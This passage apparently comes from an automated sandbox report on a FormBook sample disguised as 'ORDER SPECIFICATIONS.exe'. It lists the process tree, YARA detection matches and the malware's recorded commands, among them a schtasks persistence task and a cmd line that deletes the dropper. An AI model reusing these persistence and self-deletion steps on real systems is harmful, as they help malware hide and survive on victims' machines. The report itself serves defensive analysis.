                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:08:56:56
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp'
                                                                                      Imagebase:0x1130000
                                                                                      File size:185856 bytes
                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:08:56:56
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      General

                                                                                      Start time:08:56:57
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
                                                                                      Imagebase:0x160000
                                                                                      File size:552448 bytes
                                                                                      MD5 hash:E75A4DF51162401B21C3EB79718FB3DB
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low

                                                                                      General

                                                                                      Start time:08:56:57
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
                                                                                      Imagebase:0xac0000
                                                                                      File size:552448 bytes
                                                                                      MD5 hash:E75A4DF51162401B21C3EB79718FB3DB
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:low

General

Start time:08:57:00
Start date:23/02/2021
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:
Imagebase:0x7ff693d90000
File size:3933184 bytes
MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:08:57:15
Start date:23/02/2021
Path:C:\Windows\SysWOW64\chkdsk.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\chkdsk.exe
Imagebase:0x11d0000
File size:23040 bytes
MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:moderate

General

Start time:08:57:20
Start date:23/02/2021
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:/c del 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe'
Imagebase:0x2c0000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

General

Start time:08:57:20
Start date:23/02/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7ecfc0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Code Analysis
